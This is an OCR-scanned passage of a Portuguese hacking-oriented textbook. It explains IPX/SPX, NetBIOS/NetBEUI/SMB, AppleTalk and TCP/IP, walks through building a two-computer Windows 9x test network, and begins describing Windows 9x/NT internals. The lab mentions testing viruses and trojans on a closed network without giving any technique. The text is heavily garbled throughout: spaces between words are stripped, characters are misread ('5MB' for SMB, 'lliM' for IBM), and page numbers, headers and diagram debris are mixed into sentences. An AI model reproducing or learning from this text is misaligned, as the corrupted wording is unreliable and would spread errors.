enviadosantesdepoderenviaroutro,oquetrazprejuízosparaodesempe-
nhodarede.
Camadas
AscamadasdoprotocoloIPX/SPXatuampraticamentedamesmaforma
quenopadrãoTCP/IP;sãoelas:Aplicação,SPX,IPX,ODI/Etherneteacamada
deInterfacecomaRede.
Aplicação
SPX
IPX
ODI7Eihernet
Interfacecomarede
CadaumdosprotocolosdetodasascamadasNetwareforamespecial-
menteprojetadosparapermitirelevadaconfiabilidadeedesempenho.Vários
flagsdecontroleesistemasredundantesdeverificaçãodeerrosereenviode
pacotessãoempregados.AprópriacamadaODIrepresentaumencapsulamento
doprotocoloEthernetparafazê-Ioatenderàsexigênciasdosprojetistasna
Novell.Mas,comonemtudosãoflores,aumentaronúmerodecontrolesque
garantamconfiabilidadetemcomoreflexoaquedadodesempenhoempro-
porçãodireta.Essefoiumdosinúmerosfatoresquecontribuíramparaader-
rocadadoSPX/lPXcomofamíliapopulardeprotocolosderede.
1521
Redes1r

Universidade1°ano
NetBI05/NetBEUI/5MB/CIF5
NãohánadamaismanjadoparausuárioscorporativosderedesWindows
queafacilidadeearapidezdecompartilharcomoutroscolegasalgumaim-
pressoraoupasta.ÉpossívelatédisponibilizarumdrivedeCD,CD-R,CD-RW;
DVD,Zipoumesmodedisquete.
ONetworkBasicInputOutputSystemfoiconcebidopela lliMeextendido
pelaMicrosofteNovellparausoemsuasrespectivasredeslocais,oPCNetwork,o
LanManagereoNetwate2.0.Comoonomerealmentesugere,oNetBIOSéuma
sériedeextensõesdeentrada/saídaparaqueovell10sistemaoperacionalMS-DOSe
seusdescendentespossamacessarredeslocais.ONetBIOSbaseia-seemumformato
demensagenschamadoNetworkControlBlocks(NCB),quetrafegavampelarede
"decarona"nosprotocolosdecamada2existentes.DentrodosNCBs,trafegaum
outroprotocolochamadodeServerMessageBlocksou5MB6,queinformaonde
estãoasmáquinas,quemsãoelas,quaisseusMACaddressesequaisrecursos(discos
ouimpressoras)têmparacompartilhar.Podeserencontradoagindosobreplacas
dopadrãoEthernet,TokenRingenumfmadopadrãoWindowsNT.ONetBIOS
implementaasfunçõesdascamadas4(transporte)e5(sessão)domodeloderefe-
rênciaOS!.O5MBimplementafunçõesdascamadas
6(apresentação)esete(aplica-
ção).Entretanto,eramapenasintelfacesdeprogramaçãoenãoimplementaçãode
protocolos,enuncaforamimplementadasasfunçõescorrespondentes
àscamadas
2(datalink)e3(rede).
Comotempo,oNetBIOSfoiincorporadocomoumaAPIdeprogramaçãodo
recenteprotocoloconhecido comoNetBEUI(NetBIOSEnhanced User
Interface).SónoNetBEUI,alliM eaMicrosoftimplementaram,fmalmente,um
quadropadronizadoparatransmissãonacamada4.Acamada3,porém,ficou
aindadefora,nãosendopossívelrotearoNetBEUIentreredesdiferentes.
AduplaNetBIOS/NetBEUI semprefoilouvadaporseudesempenho em
redeslocais,normalmente pequenas.Entretanto,suaefetividadedesaparece
emredescommaisde80computadores interligados.Asrecomendações da
épocaeramdeinstalaroNetBEUIcomoutroprotocolodecamada3(como
IPXouIP)esegmentararede.Hoje,sabe-sequetalpráticaéinviávelpara
grandesredes,eumtremendofurodesegurança.Noprimeirocaso,nãose
consegueisolarossegmentosderedecombridgesemuitomenosasredes
comroteadoresporquearesoluçãodenomeseentregademensagensentre
estaçõessedápormeiodebroadcasts-mensagensdestinadasàtodaarede
indiscriminadamente.Osegundoproblemaébempior:adicionandocapacida-
desderoteamentoaoNetBIOS,abriu-seasportasparaquepessoasmalinten-
cionadasemtodoomundobisbilhotememsuaredeviaInternetsemprecisar
deoutraferramenta,alémdoInternetExplorer.
AmisturaIP/NetBEUIétãuruimqueaprópriaMicrosoftdescontinuouo
suporteaNetBEUInoWindowsXP.Asoluçãoéusar5MB(umaimplementação
decamada7)diretamentesobreTCP/lp.
6Asnovasversões do5MBforamrebatizadasdeComnon InternetFile5ystem,mas,apesarde
trazeremalgumasmelhoríasenovascaracterísticas,aindatrata-sedovelhoebom5MB.
1531
]Redes1

IUniversidadeH4CK3RI
Camadas
Incrivelmente,assoluçõesbaseadasemNetBIOSpossuem,hojeemdia,
implementaçõesparaTODASascamadasdomodelodereferênciaOSI,com
exceçãodacamadaderede.Oquenãochegaaserproblema,poiséfácil"en-
costar"oNetBIOSemumaredeIPouIPXexistente.Comosenãobastasse,é
possívelimplementarumaredeMicrosoftsuprimindoqualquerumdosproto-
colosdecamadasintermediárias,oumesmotodos.Observe:
5MB/CIFS
/I~
NetBEUI/NetBIOS NetBIOS/TCP/IP TCP/IP
RFC1001RFC1002 NetBIOS/SPX/IPX
No
primeirocaso,temosaimplementaçãooriginal,ouseja,5MB(Camadas7
e6)sobreNetBIOS/NetBEUI(5/4)sobreEthernet(2).Essaeraasoluçãonão
roteável,poisnãoháprotocolodecamadaderedesnacadeia.
Nosegundocaso,temos5MB(7/6)sobreNetBIOS(5),TCP/lP(4/3)ousobre
SPX/lPX(4/3)sobreEthernet(2).Nessaimplementação,temosoconjuntocom-
pletodecamadasOSIimplementadasporalgumprotocolo.Seporumlado
issoagradaaosredatoresdenormas,poroutrocriaumapilhadeprotocolos
muitopesadaecheiadefurosdesegurança.SeforusaraInternet,émelhor
nãoirporessecaminho.
Oterceiroéomaisradical.TodososantigosprotocolosNetBIOSforamsim-
plesmentedesprezados,umavezqueaMicrosoft"deuumjeito"defazero
5MBfuncionardiretamentesobreTCP/lp.Seporumladoháganhodedesem-
penhoesegurança,perde-seaAPIfacilitadaparaescreverprogramaspara
rede.Podemos,então,estratificaressesprotocolos(incluindoosexternosde
camadas4,3e2)daseguintemaneira:
5MB/CIFS(7e6)
NetBIOS/NetBEUI/NMB (5e4)
TCP/IPouIPX/SPX(4e3)
Ethernet(2e1)
Apesardesuaidadeesuasfalhas,protocolosbaseadosem5MB/CIFSsão
muitopopularesaindahojepelafacilidadecomqueosusuáriospodemcompar-
tilharrecursosdeseuscomputadores.Emredesbemadministradasissopode
aumentaraprodução.Emredesmaladministradas,podeaumentaraconfusão...
Emambososcasos,éaimplementaçãoderedesmaisutilizadadafacedaTerra.
j41
Redes1 r

Universidade1°ano
Appletalk
OAppletaIk,comoopróprionomesugere,éoprotocoloproprietárioutilizado
nasredesdecomputadoresApple.Écompostoporprotocolosdetransporteeen-
trega,oATP(AppleTalkTransportProtocol)eoDDP(DatagramDeliveryProtocol),
equivalentesàscamadas4e3domodelodereferênciaOSI,respectivamente.
Aplicação
Camadas
omodeloAppleTalkestádivididoem
cincocamadas:aplicação,sessão,trans-
porte,entregaeacessoàrede.Muitose-
melhantecomopadrãoOS!.
Sessão
Transporte
EntregadeDatagramas
Acessoàrede
TCP/IP
oprotocoloconhecidocomoTCP/lP(TransmissionControlProtocol!
InternetProtocol)é,atualmente,opadrãodefato.Foiconcebidojustamente
paratrabalharnascamadas3e4domodeloOSIe,portanto,sercompletamen-
teroteável.Suacriaçãotevepropósitosacadêmicosemilitares,poisfoiutilizado
emdiversasredesdeuniversidadesededefesanorte-americanasnasdécadasde
70e80.Oprotocoloatingiua"fama"comaInterneteestáimplementadoem
praticamentetodosossistemasoperacionaisexistentes.
Camadas
oTCP/lPestádivididoemdiversascamadas,comoveremosaseguir:
~Camadadeaplicação:Responsávelpelacomunicaçãoentreoprotoco-
lodestinadoaotransporteeosaplicativosemexecução,comooDNS,FTP,
HTTPeSMTP,entreoutros.CorrespondeàscamadasOSI7,6e5eé
implementadonosprópriosprogramas(camada7).
.~CamadadeTransporte:Criaaconexãovirtualentredoiscomputadores,
exatamentecomodescritodomodeloOS!.
~CamadadeInternet:Responsávelpelaorganizaçãoeroteamentodos
pacotesdefmindoseusendereços.
~CamadadeInterfacecomaRede:
Responsávelpeloenviodosdatagramaspro-
venientesdacamadadeInternet.Nãofazpar-
tedoprotocoloTCP/lP,maséumcomponen-
teobrigatório.Normalmenteéusadoopro-
tocoloEthernet,emboraoTCP/lPsejacom-
pletamenteindependenteepossatrafegarem
meiostãodísparescomofibrasóticas/FDDI,
1inksderádio,X.25ouFrameRelay.
Aplicação
Transporte
Internet
InterfacecomaRede
1551
]Redes1

IUniversidadeH4CK3R I
EntendendooTCP!IP
AfamíliadeprotocolosTCP/lPéabasedeInternetedamaioriadasredes
decomputadoresespalhadaspeloglobo.Paraentendercomoessasredesfun-
cionam,énecessárioterumanoçãodecomooprotocoloTCP/lPgerenciao
envioerecebimentodedadosentredoisnós.
NotequechamamosoconjuntodeprotocolosTCP/lPdefamília.Hámais
delesdoqueapenasessesdois,quedãonomeàfamília(esão,realmente,os
maisimportantes).Alémdeles,existeoUDP(UserDatagramProtocol)eo
ICMP(InternetControlMessageProtocol),entreoutros.TCPeUDPsãoproto-
colosdecamada4,ouseja,propiciammétodosparaqueosdadosvindosda
camada5sejamtransportadosatéonódestino.IPeICMp'poroutrolado,são
protocolosdecamada3,oquesignificaoferecerinsumosparaqueacamada4
possafazerseuserviço.
OTCP/lPeprotocolosauxiliaresestãodefinidosemumasériededocu-
mentosmantidospeloInterbetEngineeringTaskForce(lETF).Procurepelas
RFCs791,792e793nositeoficial:www.ieticom/rfc.htm1.
EmboravamosestudaroTCP/lPcomdetalhesnocapítulocomplementar
aeste,Redes11,algunsaspectosdevemestarclarosparaquepossamosconti-
nuaraleituradestelivro.
oprotocoloIP
ograndeagentetransportadordenossosdadosentreasdiferentesredes
éoprotocoloIP.Oprotocolodefineumpacotededados,quecontémcampos
parecidoscomoscamposquevimosnoquadroEtherneteumaáreapara
transportarosdadosvindosdacamadasuperior.Entreessescampos,temosos
endereçosIPdedestinoeorigem,flagsdecontroleeversão-emsuma,tudoo
queseesperadeumaimplementaçãorealdeumprotocolo.
UmpacoteIPparece-secomeste:
56I
Redes1r
VersãoI
IHLITipodeServiço TamanhoTotal
Identificação "Flags"
I Fragmentação
TempodeVida
I
Protocolo
NúmerodeVerificação
EndereçoIPdeorigem
EndereçoIPDestino
Opções(sehouverem)
IEnchimento
Dados

Universidade1°ano
EndereçoIP
UmnúmerodeIPcontém4bytescomtamanhoespecíficosnoformato:
000.000.000.000,emquecadabytepodeincorporarumvalorquevaideOaté
255,comoem198.254.10.1.Outrainformaçãopertinenteéadequenãodeve
haverduasmáquinascomomesmoendereçoIPemumamesmarede,poisisso
causariaconflitonasmáquinaseumadelasestariaimpossibilitadadese
conectaràrede.
Máscara
deRede
PossuiomesmoformatodoendereçoIP(000.000.000.000),masafeta
apenasumsegmentoparticulardarede.Éutilizadaparadividirgrandesredes
emredesmenores,facilitandoaadministraçãoereduzindotráfegoexpúrio.
TCP/UDP
DentrodospacotesIP,podemostransportardoistiposdepacotesde
dadospertencentesàcamada4.Umdeles,oTCp,éomeioutilizadopelamaio-
riadosserviçosparacarregarinformaçõesentreasduasextremidadesda
conexão,epossuicaracterísticasdecontroledefluxoerecebimento.Ooutro
éoUDp,maissimplesesemqualquertipodecontrole,masérápidoecom
impactomenornodesempenhodarede.
Portas
OpacoteIPestárelacionadoàrede,eportantosabeapenaslevarseus
dadosdeumladoaoutro.JáospacotesTCPeUDPestãomaisrelacionadosà
aplicaçãoouserviçoqueestáenviandooutransmitindoosdados.Cadaum
dessesserviçosestárelacionadoaumnúmerochamadoporta.Porexemplo,
emumservidorqualquer,aportaTCP80ofereceoserviçoHTTP,enquantoa
portaUDP53podeoferecerumservidordeDNS.
DNS
ODomainNameServertraduzumnomedefácilmemorizaçãoemum
númerodeIP.Porexemplo,vamossuporqueoIPdeumservidornaInternet
seja200.167.208.1,oDNSpoderáatribuirumnomeaeleparaquesualocali-
zaçãosejamaisfácil,comowww.siteprocurado.com.br.Aocolocaresseende-
reçolegívelnobrowser,essevaientraremcontatocomoservidordeDNSe
fazeraconversãoparanúmeroIP.
ARP
SimilaraoDNS,masfazatraduçãodoendereçoIPemendereçoMAC.
QuandoopacoteIPchegaàrededestino,devehaverummecanismoquediga
aopacoteparaqualmáquinaeledevesedirigir.ComoonúmeroIPestáconti-
donopacote,faz-seumaperguntaatodasasmáquinasdarede:"quemtemmeu
IP"?AinterfaceconfiguradacomaqueleIPrespondecomoendereçoMAC,eo
pacoteéenviadoaela.
1571
]Redes1

IUniversidadeH4CK3R I
LaboratóriodeRedesI
olaboratóriodeRedesItemcomoobjetivoauxiliaroleitoriniciantena
montagemdeumarededoméstica.Masqualéautilidadedessetipoderede
paraofuturohackerouadministrador?Arespostaébemsimples:testartécni-
casdeataqueedefesaemumaredefechada.Issopodeenglobardesdeainsta-
laçãodeumfirewallcaseiroatéotestecomvírusetrojans.
Obviamente,sãonecessáriospelomenosdoiscomputadoresparaquea
redesejacriada.Comoaintençãoémontarumaredeparatestes,vocêpode
optarporcomputadoresmaisantigosesemtantosrecursos,comoCD-ROMe
hardwaredesom.Aseguir,vamosconferirospassosparaamontagemdarede
desdeapartefísicaatéasconfiguraçõesnecessárias.
Recursosnecessários
~2computadores;
~2placasderede(pCIouISA);
~Cabosdepartrançadonaconfiguraçãocross-over;
~Sistemaoperacional(nessecaso,estaremostrabalhandocomWmdows9x).
Instalaçãodapartefísica
Apósaescolhadasplacasderede,chegaomomentodeinstalá-Iasnos
computadores.Essanãoéumatarefadifícil,bastaapenasquevocêtomecuida-
doparanãodanificaroequipamento.Apósaaberturadogabinete,devemos
procurarumslotlivreparaacomodaraplacaderede.Geralmente,elesficam
situadosnaparteinferioràdireitadaplaca-mãe,comomostraafigura:
Slot
~
"",,,,,.,,,,,,,,,,,,,,,,,,,,,,,,"""""
""''''''''''''''''''''''''''''''''''''''''
'''''''''''''''''''',,,,,,,,,,,.,,"""""
''''''''''"""''''''''''''''''''''''''''''
""""""",,,,,,,,,,,,.,,,,,,,"""""
"""""''''''''''''''''''''''''"''''''''
''''''''''''''''''''""""""""'''''",
""""""""""""''''''''''''''''''''
""""""""""""""""""""""
""""""""""""''''''''''''''''''''
.......................................................
11111111111111111.
........................
...............................
.11111111111111111.
158I
Redes1r

Universidade1°ano
Apósaftxaçãodaplaca,reinicieocomputador.Provavelmenteosistema
operacionalvaidetectarapresençadeumnovohardwareeapresentaruma
janelacomasopçõesparaainstalação.Optesempreporinstalarosdrivers
originaisqueacompanhamaplaca.OWindowsvaiconcluirainstalaçãoe
entãoésórepetiroprocessonooutrocomputador.Apósdecidirondeasmá-
quinasftcarãolocalizadas,chegaahoradecolocaroscabosparaconcluira
partefísicadarede.
Comoestamostratandodaconexãodeapenasdoismicros,usaremosó
caboconhecidocomocross-over.Oscabosderedepossuempequenosftosque
devemestardispostosemumacertaseqüênciaparaquepossahaveratrocade
dados,nocasodocross-over,éprecisoinverteralgunsdessesftos.Aslojasde
informáticajávendemessescabosprontos,mas,sevocêquiseraprendercomo
montá-Ios,observenoquadroabaixoaseqüênciacorretadeclipagemnocabo,
lembrandoqueoconector(pontadocabo)deveserRJ-5M:
PontaA
1-Branco/iaranja
2-Laranja
3-Branco/Verde
4-Azul
5-Branco/Azul
6-Verde
7-Branco/Marrom
8-Marrom
PontaB
l~Branc()/Verde
.
2-Verde
3-BrancolLaranja
4-Azul
5-Branco/Azul
6-Laranja
7-Branco/Marrom
8-Marrom
Agora,bastaapenasconfiguraroscomputadoresparaestabeleceruma
conexãoderede.Atenção!Nuncauseumcabocross-overemumaredecom
hubs.Ariscodedanillcaroequipamento.
Configurandoarede
Comtodasasinstalaçõesdehardwarecompletas,chegaahoradeconftguraros
computadores.Paramontagemdarede,vamosutilizaroprotocoloTCP/lPvisto
anteriormente,poisesseémaisflexíveleconftável.AconftguraçãodoendereçoIP
ftcaacritériodequemestámontandoarede,issoporqueopróprioWmdows
podedesignarumIPautomaticamenteparacadamáquinasedesejado.Aqui,nós
atribuiremosmanualmenteosIPs.
Windows9.x
Emprimeirolugar,vocêdeveráutilizarafaixaIPsqueestãoreservadasparaas
redesdomésticas.Essenúmeroftcaentre192.168.0.1e192.168.255.254,além
disso,oendereçodecadamicrodeveserdiferenteparaquenãohajaconflito
entreosdois.TambémdevemosconferirseoprotocoloTCP/lPestáinstalado.
Paratanto,abraopaineldecontroleeváem"Redes",seoprotocolonãoestiver
1591
IRedes1

IUniversidadeH4CK3R I
listadonaguia"Configuração",entãoseránecessárioinstalá-Io.Aproveitetam-
bémparainstalaro"ClientepararedesMicrosoft"eo"Compartilhamentode
arquivoseimpressoraspararedesMicrosoft".Então,diquenobotão
"compartilhamentodearquivoseimpressoras"emarqueaopção"Desejoque
outrosusuáriostenhamacessoaosmeusarquivos".
ApósdecidironúmerodeIp,éhoradeprosseguir.Abranovamenteo
íconederedesnopaineldecontrole,escolhaoprotocoloTCP/lPecliqueno
botãodepropriedades.Umanovajanelaseráaberta,entãocliquenaguia"En-
dereçoIP"emarqueaopção"EspecificarumendereçoIP",preenchaocampo
doIPcomonúmerodesuapreferênciae,nocampodasub-máscaraderede,
vocêdevecolocaroseguintenúmero:255.255.255.0.
Agoranósdevemosidentificarocomputadoreogrupodetrabalho,para
isso,diquenaguia"Identificação"najaneladeredes.Lembrandoqueonome
doscomputadorespodeserdiferente,masagrupodetrabalhodevesero
mesmo.Ocomputadorseráreinicializado,masdestavez,elepediráumasenha
eumloginparaarede.
Pronto,seosdoiscomputadoresestiveremconectadoseconfigurados
corretamente,vocêdevetersuarederodandosemproblemas.Paracomparti-
lharumapasta,bastaapenasclicarcomobotãodireitodomousenapasta
desejadaeacessarasopçõesdecompartilhamento.
II
Redes1[

Plataforma
Windows
Capítulo
"Aujourd'huirOI;demainrien",I
(Ditadopopularfrancês]
1Hojerei.alllanl1ãnada.

IUniversidadeH4CK3RI
Costuma-sedizerquemaisde90%doscomputadoresdestinadosaousuário
final-sejaemempresasouemcasa-possuemalgumsistemaMicrosoft
Windowsinstalado.Essesnúmerospodematéserquestionados,maséinegável
queaempresafezumbomtrabalhodeusabilidade(edemarketing!)para
fazerousuárioeodesenvolvedordesoftwareacreditaremqueoWindowséa
únicaopçãodesistemaoperacionalparaleigos.
Hojearealidadeéatéumpoucopiorqueisso.Aspessoascompramseus
computadoresemsupermercadoscomWindowsinstaladodefábricaeacredi-
tamqueoprogramaéparteintrínsecadamáquina.Elasnãoachamquepreci-
semdeopções.Assimcomocompra-seumautomóveljácomovolante,com-
pra-secomputadoresjácomosistemadagigantedeRedmond.
As~~famílias"Windows
HáduascorrentesdedesenvolvimentodoMicrosoftWindows,formandoqua-
sequeduasplataformascompletamentediferentesinternamente,emboracon-
servandoamesmaaparênciaexterna.
FamíliaWin9x
CompostapelossistemasWindows95,Windows98eWindowsMe,essa
famíliacaracteriza-seporpossuirumkernelempartebaseadonoantigoMS-
DOSe,portanto,compatibilidadecomprogramasantigos.Tambémporisso
possuemalgumaslimitações.
AfamíliaWin9xéumaversãoquasetotalmentereescritadoWindows3,que
nãoeraexatamenteumsistemaoperacional.OWindows3eraconsideradopor
algunsapenascomoumainterfacegráficaquerodavaemcimadoMS-DOS.Os
autoresconcordamcomessaafIrmaçãoapenasemparte.OWindows3acres-
centavacaracterísticashámuitodesejadaspelosusuáriosejápresenteháal-
gunsanosemsistemasMacintosh,comooprocessamentomultitarefaeum
melhorgerenciamentodememória.Eousuáriopodiainteragircomosistema
utilizandoumdispositivoapontador,omouse.Issodesobrigava-oadecorarde-
zenasdecomandosparachamarseusprogramasegerenciarseusarquivos.Com
efeito,podemosdizerqueoconjuntoMS-DOS+Windows3deveriaserconsi-
deradoumsistemaoperacionalcompleto.
OWindows95eraumpassoàfrente.AsAPIs(ApplicationProgramming
Interfaces-umaespéciede"tomada"dosistemaoperacionalemquevocê
encaixaoseuprograma)foramcompletamenteremodeladas.Masokerneldo
sistemaeraum"frankenstein"contendovárioselementosnovoscosturadosem
umaversãoatualizadadovelhoMS-DOS,emboratotalmenteescondido.Asver-
sõessubseqüentes(Windows98,Windows98SEeWindowsMe)aindacarre-
gamversões(sempreatualizadas,éverdade)dessekernel.ComooMS-DOSera
monotarefa,transformá-IoemumsistemamultitarefacomooWindowsreque-
reudiversoswork-aroundseprogramasexternosrodandonaáreadousuárioe
41
PlataformaWindows[

Universidade1°ano
executandotarefasqueseriamdokemel.Ogerenciamentodememóriaéum
exemplo.Talvezissoexpliqueaconhecidainstabilidadedessessistemas,espe-
cialmenteoserrosdotipoGPEAadoçãodoMS-DOScomopontodepartida
paraodesenvolvimentodasnovasversõesdoWindowsteve,entretanto,avan-
tagemdeoferecercompatibilidadeasoftwareehardwareantigos.
FamíliaWinNT
ÉcompostapelossistemasoperacionaisWindowsNT,Windows2000e
Windows:xp2.Suaprimeiraversão,oWindowsNT,foidesenvolvidaparasero
sistemaoperacionalderedesdaMicrosoft.Utilizandotecnologiaderededo
LANManagercomainterfacegráficadoWindows3.1eumnovoprojetode
kemel,oWindowsNTpretendiabrigarnummercadodominadopormáquinas
UnixeNovell.Mesmocomdesempenho,escalabilidadeeconfiabilidade,na
época,menoresdoqueosdeseusadversários,aMicrosoftconseguiu,empou-
cosanos,alavancaroWindowsNTcomoaplataformaderedesmaisviávele
utilizada.Fezissobaseadaemtrêsprincípios:
~Preçobaixo:umalicençadoWindowsNTcustavamuitíssimomenosque
licençasdoNovellNetwareoudequalquersabordeUnix.Erodavaemservido-
resbaseadosemprocessadoresIntel,hardwaremaisbaratoqueascaríssimas
RISCdosUnices.
~Facilidadedeconfiguraçãoeoperação:enquantoosservidoresUnixe
Novellpossuíaminterfacescomousuáriobaseadasemcaractere,oWindows
NTdisponibilizavaparaosadministradoresdesistemaumainterfacegráfica
semelhanteàdosmicrosdesktop.
~Marketing:amáquinadedivulgaçãodaempresa,localizadaemRedmond,
noestadodeWashington,EUA,émundialmenteconhecida.Elesforammuito
felizesaopromoveronovosistemaoperacionalderedesdaMicrosoft,eviden-
ciandoaomáximonamídiaosdoisprincípiosanteriores.
OssistemasoperacionaisparaservidoresderededaMicrosoft,impulsiona-
dospelostrêsprincípioscitadoseauxiliadospelainérciadosconcorrentes,
levaramoWindowsNTaoprimeirolugaremservidoresadministrativosdu-
ranteadécadade90.MasaMicrosoftpercebeuquehaviaummercadotam-
bémparaSOsquerodassemnoscomputadoresdaspessoas,emcasaouno
escritório.Essaspessoasnecessitavamdaestabilidadeeconfiabilidadequeo
kerne1doWindowsNTproporcionava.
AfamíliaWindowsNTlogoganhouversõesparaserusadanasmáquinas-
cliente(ouseja,emcasaounoescritório).ErachamadodeWindowsNT
Workstation,epossuíaumaestabilidademuitosuperioràdequalquermem-
2ApesardeaMicrosoftdivulgarqueoWindows2000éumsistematotalmentereescrito,apenas
baseadonoWindowsNT,sabe-seporfontesnãooflciaisqueeleaindapossuimuitacoisaintocadado
NToriginal.OWindowsXp,poroutrolado,possuipartesdoWindows2000edoWindowsMe,para
garantircompatibilidadecomosprogramasantigosdousuário.Oquequerdizerqueaindahá
tecnologiasdoNT,doWin9xemesmodovelhoMS-DOSnele.
1651
IPlataformaWindows

IUniversidadeH4CK3RI
brodafamíliaWin9xatéhoje.Era,basicamente,okerne1doNTServersemos
serviçosdeservidorecomalgumasmodificaçõesparaadaptá-Ioaoscomputa-
doresdemesa.Algunsusuários,cansadosdeterdereiniciaramáquinaeper-
derdadosacadaGPF,migraramparaoWindowsNTWorkstation 3.
Masnemtudoeramflores.Okerne1doWindowsNTeramuitodiferentedo
kerneldafamíliaWin9x.Quebraracompatibilidadeentresistemasoperacionais
significavaquebraracompatibilidadecomsoftwareehardwareantigos.Mui-
tosdelessimplesmentenãofuncionariamnoWindowsNT.Ousuáriodeveria
escolher,então,entreestabilidadeecompatibilidade.
AúltimaencarnaçãodoWindows,batizadadeXP,pretendeacabarcomesse
problema.Utilizandotécnicasdeconvergênciaentreastecnologiasdasfamíli-
asWin9xeNT,aMicrosoftconseguiucriarumaversãodeseuprodutomais
famosoque,segundoela,aliaaestabilidadedoWindows2000eacompatibilida-
dedoWindowsMe.AversãoServerdoWindowsXp,chamadadeWindows
2003Server4,deveestarnomercadoemmeadosdesteano.
Nosbastidores...
Qualquerumquetenhaoobjetivodesetornarum"hacker"(qualquerque
sejaosentidoquevocêempregueàpalavra)deveconhecerprofundamenteo
funcionamentodepelomenosumsistemaoperacional.Apesardeossistemas
Unixseremumaboaescola,porsuamodularizaçãoextremamentedidática,
entenderoquesepassa"nascoxias"dossistemasdaMicrosoftajudaaenten-
dercomoumsistemapodeevoluir,epossíveismaneirasdecontornarproble-
masinerentesàcompatibilidadecomtecnologiasantigas.
DevidoànaturezaproprietáriaefechadadosprodutosMicrosoft,nemtodas
asinformaçõessobreossistemassãodivulgadas.Estecapítulotomoucomo
pontodepartidaoknowledgebaseautorizadopelaempresa.Nãoentraremos
emmuitosdetalhesarespeitodokerneldosistema.
Estrutura
Deumaformageral,ambasasfamíliasdosistemaoperacionalWindowsem-
pregamoconceitodemicrokernel:apenasosserviçosmaisbásicossão
implementados.Todososoutrossãoexecutadosporprogramasexternos,que
rodamemusermode,ouseja,comoprogramascomuns.Grossomodo,isso
significaqueousuáriopodeperigosamenteteracessoapartesdokernel.
3Algunsusuáriostentaramoutrossistemas,comooOS/2(antesdesermortopelaIBM),oMacintosh
(nestecaso,substituindonãosóosoftware,mastodoocomputador)e,maisrecentemente,opções
comooBeOS,oFreeBSDeolinux.ComexceçãodoOS/2edoBeOS(recentementedescontinuado),a
maioriadaspessoasquemigrouparaoutrasplataformasnãoretornouaoWindows.Sintomático?
4Essaversãoteveoficialmentequatronomesdiferentes,eoutrostantosextra-oficiais.Chegouaser
chamadadeWindows.NETServernumareferênciaàsnovastecnologiasbaseadasemXMLdaempre-
sa,masaoquepareceaMicrosoftdesistiudaassociaçãononome.Mesmoassim,oprodutoestásendo
chamadonositedaempresade"oaglutinadordastecnologias.NET"("thegluetoall.NETtechnologies'').
,61
PlataformaWindowsI

Universidade1° ano
UserMode
,
,
,
,
,
,
,
,
,
"
,.
,
,
,
,
~~"
~~
KernelMode
Hardware
Internamente,asduasfamíliasdeprodutosWindowssãomuitodiferentes,
emboraexistaumacamadadecompatibilidadeparaqueambasasplataformas
possamcompartilharosmesmosdriversdeequipamentoseperiféricos,os
famigeradosDeviceDrivers.AfamíliaNTpossuiaindacamadasdecompatibi-
lidadedesoftwarequepermiteaosistemaoperacionalexecutarcomsucesso
programasdesenvolvidosparaafamíliaWin9xemesmoparapadrõesalienígenas
comoUnixIPOSIX,Windows16bitseOS/2daIBM.
~FamíliaWm9x
Acessórios
Programas
Shellde32-bits
C:J
]I
NúcleodoWindows 98 ("core")
Registro
[
EJ
I
Gerenciadorde
sistemasde
arquIvos
instaléveis(lFS)
Gerenciadorde
Configuração
Gerenciadorde
DriversWDM
OeviceOrivers
1671
IPlataformaWindows

IUniversidadeH4CK3R I
Observeatentamenteodiagrama.AestruturainternadoWindows9xéapa-
rentementemodular.Háumadivisãoclaraentreonúcleo(normalmentecha-
madodecore)easoutraspartesdosistema.Taldivisão,emboravisívelno
papel,éextremamentetênuenaprática.Váriosprocessoscríticosdosistema
rodamnamesmaáreadememóriaedisputamosmesmosrecursosde
processamentoqueosprogramasdousuário.Apesardesimplificarodesen-
volvimentodoSOepermitircompatibilidadecomhardwareesoftwarelega-
dos,nãohácomoescapardasinstabilidadesqueessaestruturaacarreta.
Osprogramasdousuário(planilha,editordetextos,navegador,etc.)nãoacessam
onúcleodiretamente.Cadaprogramade32bitsrodaemumamáquinavirtual
separada,etemaimpressãodepossuirumhardwareeumnúcleodosistema
operacionalexclusivos.ProgramasantigosparaoMS-DOStambémrodamem
máquinasvirtuaisseparadas,mesmoporqueelestendemacapturartodososre-
cursosdamáquinaparasie,nãofossemasmáquinavirtuais,seriaimpossívelrodá-
losnoWmdows.Jáosprogramasde16bitsdoWmdows3,devidoàsuanatureza
multitarefacolaborativa,rodamtodosnumamesmamáquinavirtualde16bits.
Háumshellparaintetfacearasmensagensentrecadamáquinavirtualdosprogra-
maseonúcleorealdosistema.Esseshelltambémseencarregadeforneceroswidgets
(botões,barrasderolagem,indicadoresdeprogresso,decoraçãodasjanelas)paraas
aplicaçõesedemostrarasjanelasjámontadasparaousuário,deformaqueelepossa
interagircomosistema.Esseshelltambémfornecealgunsdosutilitárioseferramentas
dosistema,comooWmdowsExplorer,oPaineldeControleeoAmbientedeRede.
Registro
!N,úéíeodoWindows98("core"),/ I
tE
Gerenciadorde
sistemasde
II
Gerenpiadorde
arquivos Configuração
instaléveís(lFS)
,
Gerenciadorde
DriversWDM
(Botões,
barrasdeprogresso,caixasdediálogo
modosdevisualizaçãodejanelas...)
ocoraçãodafamíliaWin9xéocoresystem.Compostoportrêscomponen-
tes:okernel,responsávelpelocontroledeprocessos,deEISedohardware;o
user,quecontrolaoselementosmanipuláveispelousuário(janelas,eventos
disparadospelousuário,ícones,menus)emultimídia;eoGDIouGraphics
DeviceInterface,queinteragecomohardwaredevídeo.Osubsistemadeim-
pressãotambémestásituadonoGDI.
1681
PlataformaWindows[

Universidade1°ano
Acessórios
Programas
Shellde32-bits
C:J
]I
Registro
NúcleodoWindows98("core")
VMM
Gerenciadorde
sistemasde
1I
Gerenqi-aéÍorde
arquivos COr)fiyuração
instaléveis(lFS) ,
Gerenciadorde
DriversWDM
~y-ÓeviceOrivers
GOl
Kernel
AfamíliaWin9xtemocompromissodesercompatívelcomaplicativos
antigosde16bitsdoWindows3.11emesmodoMS-DOS.Portanto,oscom-
ponenteskernel,usereGDIdonúcleosão,naverdade,duplasdearquivos.
OscomponentescorrespondentesdoanciãoWindows3.11aindaestãopre-
senteseosaplicativosantigososacessam.Esseéumdosmaiorescalcanha-
res-de-aquilesdafamíliaWin9x:osprogramasde16bitsnãotrabalhamem
modoprotegido,nemacessamumcorequetrabalhenessemodo.Oresulta-
doéadestruiçãocompletadapreempçãomultitarefadosistemaedo
gerenciamentodememória.
Entreonúcleoeosdriversparaosdispositivosdehardwareexisteumacama-
datambémdeinterface,comrotinasquetornamocoredoWindowsindepen-
